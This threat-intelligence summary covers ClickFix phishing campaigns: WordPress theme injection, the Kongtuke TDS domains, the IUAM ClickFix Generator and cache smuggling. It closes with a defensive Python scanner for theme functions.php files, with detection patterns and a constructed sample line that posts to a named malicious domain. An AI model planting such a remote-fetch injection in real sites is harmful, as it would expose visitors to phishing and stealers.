WordPress Sites Exploited for ClickFix Phishing Attacks
Summary
WordPress sites are being exploited to inject malicious JavaScript that redirects users to phishing pages. The attacks use a theme-related file to load a dynamic payload from a remote server, which includes a JavaScript file and a hidden iframe mimicking legitimate Cloudflare assets. The domain involved is part of a traffic distribution system (TDS) known as Kongtuke. The campaign highlights the need to secure WordPress sites and keep software up to date.

Additionally, a new phishing kit named IUAM ClickFix Generator allows attackers to create customizable phishing pages mimicking browser verification challenges. This kit has been used to deploy information stealers like DeerStealer and Odyssey Stealer. The emergence of such tools lowers the barrier to entry for cybercriminals, enabling sophisticated, multi-platform attacks.

A new ClickFix campaign employs cache smuggling to evade detection, using the browser's cache to store malicious data without downloading files or communicating with the internet. The attack masquerades as a Fortinet VPN Compliance Checker, executing an obfuscated payload via a PowerShell script.
Timeline
- 08.10.2025 19:43 (1 article)
WordPress Sites Exploited for ClickFix Phishing Attacks
WordPress sites are being exploited to inject malicious JavaScript that redirects users to phishing pages. The attacks use a theme-related file to load a dynamic payload from a remote server, which includes a JavaScript file and a hidden iframe mimicking legitimate Cloudflare assets. The domain involved is part of a traffic distribution system (TDS) known as Kongtuke. Additionally, a new phishing kit named IUAM ClickFix Generator allows attackers to create customizable phishing pages mimicking browser verification challenges. This kit has been used to deploy information stealers like DeerStealer and Odyssey Stealer. A new ClickFix campaign employs cache smuggling to evade detection, using the browser's cache to store malicious data without downloading files or communicating with the internet. The attack masquerades as a Fortinet VPN Compliance Checker, executing an obfuscated payload via a PowerShell script.
- Hackers Exploit WordPress Sites to Power Next-Gen ClickFix Phishing Attacks — thehackernews.com — 08.10.2025 19:43
Information Snippets
- Attackers are injecting malicious JavaScript into WordPress sites via the 'functions.php' file in themes.
  First reported: 08.10.2025 19:43 (1 source, 1 article)
  - Hackers Exploit WordPress Sites to Power Next-Gen ClickFix Phishing Attacks — thehackernews.com — 08.10.2025 19:43
- The injected code sends an HTTP POST request to 'brazilc[.]com' to retrieve a dynamic payload.
  First reported: 08.10.2025 19:43 (1 source, 1 article)
  - Hackers Exploit WordPress Sites to Power Next-Gen ClickFix Phishing Attacks — thehackernews.com — 08.10.2025 19:43
- The payload includes a JavaScript file from 'porsasystem[.]com' and a hidden iframe mimicking Cloudflare assets.
  First reported: 08.10.2025 19:43 (1 source, 1 article)
  - Hackers Exploit WordPress Sites to Power Next-Gen ClickFix Phishing Attacks — thehackernews.com — 08.10.2025 19:43
- The domain 'porsasystem[.]com' is part of the Kongtuke traffic distribution system (TDS).
  First reported: 08.10.2025 19:43 (1 source, 1 article)
  - Hackers Exploit WordPress Sites to Power Next-Gen ClickFix Phishing Attacks — thehackernews.com — 08.10.2025 19:43
- The infection chain starts with users visiting a compromised site, leading to ClickFix-style pages for malware distribution.
  First reported: 08.10.2025 19:43 (1 source, 1 article)
  - Hackers Exploit WordPress Sites to Power Next-Gen ClickFix Phishing Attacks — thehackernews.com — 08.10.2025 19:43
- The IUAM ClickFix Generator allows attackers to create customizable phishing pages mimicking browser verification challenges.
  First reported: 08.10.2025 19:43 (1 source, 1 article)
  - Hackers Exploit WordPress Sites to Power Next-Gen ClickFix Phishing Attacks — thehackernews.com — 08.10.2025 19:43
- The IUAM ClickFix Generator has been used to deploy information stealers like DeerStealer and Odyssey Stealer.
  First reported: 08.10.2025 19:43 (1 source, 1 article)
  - Hackers Exploit WordPress Sites to Power Next-Gen ClickFix Phishing Attacks — thehackernews.com — 08.10.2025 19:43
- A new ClickFix campaign uses cache smuggling to evade detection, storing malicious data in the browser's cache.
  First reported: 08.10.2025 19:43 (1 source, 1 article)
  - Hackers Exploit WordPress Sites to Power Next-Gen ClickFix Phishing Attacks — thehackernews.com — 08.10.2025 19:43
- The cache smuggling attack masquerades as a Fortinet VPN Compliance Checker, executing an obfuscated payload via a PowerShell script.
  First reported: 08.10.2025 19:43 (1 source, 1 article)
  - Hackers Exploit WordPress Sites to Power Next-Gen ClickFix Phishing Attacks — thehackernews.com — 08.10.2025 19:43
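
The snippets above name the injection point (a theme's 'functions.php') and two domains. The following is an added example, not code from the cited article or any vendor: a defender-side sweep of theme 'functions.php' files for those domains and for outbound HTTP calls. The list of PHP call names is an assumption chosen for illustration, and the sample site is constructed.

```python
import re
import tempfile
from pathlib import Path

# Domains named on this page, kept defanged in source and refanged at load time.
IOC_DOMAINS = [d.replace("[.]", ".") for d in ("brazilc[.]com", "porsasystem[.]com")]

# Assumption: PHP calls commonly used for outbound HTTP. A hit is a lead to
# review by hand, not proof of compromise (legitimate themes use them too).
REMOTE_CALLS = re.compile(
    r"\b(wp_remote_post|wp_remote_get|curl_exec|file_get_contents|fsockopen)\s*\("
)


def scan_functions_php(wp_root):
    """Return (relative path, line number, reason) for each finding in theme functions.php files."""
    root = Path(wp_root)
    findings = []
    for path in sorted(root.glob("wp-content/themes/*/functions.php")):
        rel = path.relative_to(root).as_posix()
        text = path.read_text(encoding="utf-8", errors="replace")
        for lineno, line in enumerate(text.splitlines(), start=1):
            lowered = line.lower()
            for domain in IOC_DOMAINS:
                if domain in lowered:
                    findings.append((rel, lineno, f"ioc-domain:{domain}"))
            match = REMOTE_CALLS.search(line)
            if match:
                findings.append((rel, lineno, f"remote-call:{match.group(1)}"))
    return findings


def build_sample_site(base):
    """Constructed sample data: one clean theme and one with an injected remote fetch."""
    themes = Path(base) / "wp-content" / "themes"
    clean = "<?php\nadd_action('after_setup_theme', 'mytheme_setup');\n"
    injected = (clean
                + f"$r = wp_remote_post('https://{IOC_DOMAINS[0]}/', array('body' => array()));\n"
                + "echo wp_remote_retrieve_body($r);\n")
    for name, body in (("clean-theme", clean), ("hit-theme", injected)):
        (themes / name).mkdir(parents=True)
        (themes / name / "functions.php").write_text(body, encoding="utf-8")
    return base


if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as tmp:
        for finding in scan_functions_php(build_sample_site(tmp)):
            print(finding)
```

Point `scan_functions_php` at a real WordPress root to triage; comparing each flagged file against a known-good copy of the theme is the confirming step.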